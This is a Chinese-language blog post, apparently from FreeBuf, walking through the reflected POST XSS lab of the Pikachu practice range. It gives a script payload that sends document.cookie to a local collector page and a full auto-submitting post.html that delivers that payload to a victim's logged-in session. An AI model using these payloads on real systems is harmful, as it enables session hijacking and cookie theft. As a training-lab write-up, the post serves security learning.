freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

pikachu靶场-XSS跨站脚本-反射型xss(post)
2021-07-14 07:45:04

1626136221_60ecde9d1aa1892acd9ca.png!small

根据之前的破解结果:

用户名:admin

密码:123456

因为是POST,我们首先尝试一下BURP抓包!

可以看到此时的用户名和密码是以通过DATA形式传递的!!!

TIPS:post是无法在URL中插入payload的,是需要插入内容到数据包的,那么如何将数据包这种类型的攻击发送给用户呢?通过html页面方式提交,构造一个自己的post丢到自己的网站上。

get型xss是直接更改URL就可以了,可以直接在参数后加payload。

1626136234_60ecdeaad13d980f60545.png!small

登录成功的的请求报文!!!

1626136242_60ecdeb2a2aaa8b5e83f7.png!small

这里我们看一下第一个请求报文的响应报文什么样???

1626136248_60ecdeb8a94373982a3d5.png!small

已成功登录:

1626136255_60ecdebfe5cf6e0676c41.png!small

这里我们先输入一下kobe,并通过BURP进行抓包,查看回显信息!!!

1626136262_60ecdec66836b56d4f8c6.png!small

这里我们可以看到内容kobe是通过HTTP POST方法进行传递,这直接导致的结果是我们无法通过构造URL的方式实现XSS攻击!!!

1626136270_60ecdece8da5673b88fe9.png!small

试!

我们看下这个输入框的源代码!!!

呀!不对啊,POST是不能在URL中构造,不代表不能在输入框中构造!!!

再探!!!

这次咱们直接在输入框中,直接输入PAYLOAD,如下!!!

kobe<script>location.href="http://localhost/pikachu/pkxss/xcookie/cookie.php?cookie="+document.cookie</script>

然后在XSS后台中,查看是否获取到COOKIE值!!!

搞定!!真的获取到了!!!只是URL中,没有变化!!!

1626136282_60ecdeda3f950528a63dd.png!small

既然,POST类型的XSS也叫反射型的XSS漏洞,那么一定可以通过构造的方式,构造URL,让已经登录的被害者,通过自己点击的方式,触发构造的漏洞,从而实现攻击!!!!!

1626136289_60ecdee1a0176d3504e1e.png!small

源代码中恶意站点的post页面。当用户访问这个页面的时候,它会自动向目标站点提交post请求

windows.onload模拟用户点击。

恶意链接:http://localhost/pikachu/pkxss/xcookie/post.html

恶意代码:如下:post.html代码!!!!

<html>

<head>

<script>

window.onload = function() {

document.getElementById("postsubmit").click();

}

# window.onload() 方法用于在网页加载完毕后立刻执行的操作,即当 HTML 文档加载完毕后,立刻执行某个方法。

</script>

</head>

<body>

<form method="post" action="http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php">

<input id="xssr_in" type="text" style="display:none" name="message" value=

"<script>

document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;

</script>"

/>

<div style="display:none;"><input id="postsubmit" type="submit" name="submit" value="submit" /></div>

</form>

</body>

</html>

费了很大劲才出结果了!!!!

1626136300_60ecdeec978a247604614.png!small

对了,有个问题啊!!!

1626136306_60ecdef28db1d0cb452e3.png!small

如果,这个真实的情况下?

这个post.html文件是如何上传到目标主机的?

这是个问题!!!

# web安全 # 网络安全技术 # Pikachu
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者